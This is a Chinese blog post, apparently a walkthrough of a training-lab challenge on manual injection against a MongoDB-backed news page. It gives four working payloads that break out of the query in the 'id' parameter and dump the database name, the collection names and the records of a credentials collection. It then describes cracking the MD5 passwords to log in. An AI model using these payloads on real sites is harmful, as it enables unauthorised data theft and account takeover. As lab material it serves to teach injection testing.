当前位置: 首页 > news >正文

SQL手工注入漏洞测试(MongoDB数据库)

news 来源:原创 2024/9/20 12:34:42

此次靶场地址为:墨者学院

⼀. 如下给出的源码...可以看到数据库查询的语句如下..构造回显测试... 

new_list.php?id=1'});return ({title:'1',content:'2

⼆.成功显示“ 1” 和“ 2” 。可以在此来显示想要查询的数据。接下来开始尝试构造payload查询 当前数据库。通过回显观察到数据库为 mozhe_cms_Authority 其中tojson是可以把数据变成 json型数据,db为取当前数据库,即当前的数据库为 mozhe_cms_Authority 

new_list.php?id=1'});return({title:tojson(db),content:'2

三.得到数据库名之后就可以尝试爆出数据库下的表名了且构造Payload...其中db.getColl ectionNames() 返回⼀个包含当前数据库中所有集合名称的数组。

new_list.php?id=1'});return({title:tojson(db.getCollectionNames()),conten t:'2 

四.这样数据库的表名就被爆出来了,⼀共有三个表,分别为: Authority_confidentia l 、 notice 、 system_indexes 。最后我们就可以直接选取某个表爆出其中的数据了... 

new_list.php?id=1'});return({title:tojson(db.Authority_confidential.find() 0]),content:'2

五.最终我们就可以获得数据了,将密码进⾏MD5解密,返回登录⻚进⾏登录,划倒⻚⾯最下 端就可以看到KEY了。如果第⼀个⽤户账号密码登录不了,我们就改变查询的索引“ find()[1]” 查询 其他的⽤户账号密码登录即可.. 

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Xmind 在线导图上线!多设备实时同步,节约本地空间
  • 【Kotlin】在Kotlin项目中使用AspectJ
  • Python核心编程--Python要点总结
  • Swift 内存管理:精通强、弱、无主之地
  • IOS半越狱工具nathanlr越狱教程
  • 计算机毕业设计选题推荐-Cosplay论坛系统-Java/Python项目实战
  • 【UE5.1】NPC人工智能——06 NPC攻击
  • 在Ubuntu 部署 Grafana且监控MySQL数据
  • PDF文件切割,无大小限制
  • WPF中的XAML是如何转换成对象的?
  • react面试题一
  • Vue实现表格数据的增删改查
  • 死锁如何产生及避免
  • 【计算机三级-数据库技术】操作题大题(第六套)
  • python数组列表操作简记二
  • (三)从jvm层面了解线程的启动和停止
  • 【159天】尚学堂高琪Java300集视频精华笔记(128)
  • 【162天】黑马程序员27天视频学习笔记【Day02-上】
  • 2017-09-12 前端日报
  • 2017年终总结、随想
  • avalon2.2的VM生成过程
  • Git 使用集
  • IDEA常用插件整理
  • JavaScript工作原理(五):深入了解WebSockets,HTTP/2和SSE,以及如何选择
  • LeetCode29.两数相除 JavaScript
  • XML已死 ?
  • Yeoman_Bower_Grunt
  • Zsh 开发指南(第十四篇 文件读写)
  • 服务器从安装到部署全过程(二)
  • 浮动相关
  • 基于MaxCompute打造轻盈的人人车移动端数据平台
  • 区块链共识机制优缺点对比都是什么
  • 阿里云API、SDK和CLI应用实践方案
  • 阿里云重庆大学大数据训练营落地分享
  • 如何在招聘中考核.NET架构师
  • # Panda3d 碰撞检测系统介绍
  • #pragma pack(1)
  • #基础#使用Jupyter进行Notebook的转换 .ipynb文件导出为.md文件
  • #我与Java虚拟机的故事#连载10: 如何在阿里、腾讯、百度、及字节跳动等公司面试中脱颖而出...
  • $forceUpdate()函数
  • $var=htmlencode(“‘);alert(‘2“); 的个人理解
  • (1)(1.13) SiK无线电高级配置(六)
  • (JS基础)String 类型
  • (阿里巴巴 dubbo,有数据库,可执行 )dubbo zookeeper spring demo
  • (第9篇)大数据的的超级应用——数据挖掘-推荐系统
  • (附源码)springboot家庭财务分析系统 毕业设计641323
  • (附源码)ssm高校志愿者服务系统 毕业设计 011648
  • (过滤器)Filter和(监听器)listener
  • (每日持续更新)信息系统项目管理(第四版)(高级项目管理)考试重点整理第3章 信息系统治理(一)
  • (十)Flink Table API 和 SQL 基本概念
  • (十二)devops持续集成开发——jenkins的全局工具配置之sonar qube环境安装及配置
  • (十三)MipMap
  • (四)Tiki-taka算法(TTA)求解无人机三维路径规划研究(MATLAB)
  • (算法二)滑动窗口
  • (一)Java算法:二分查找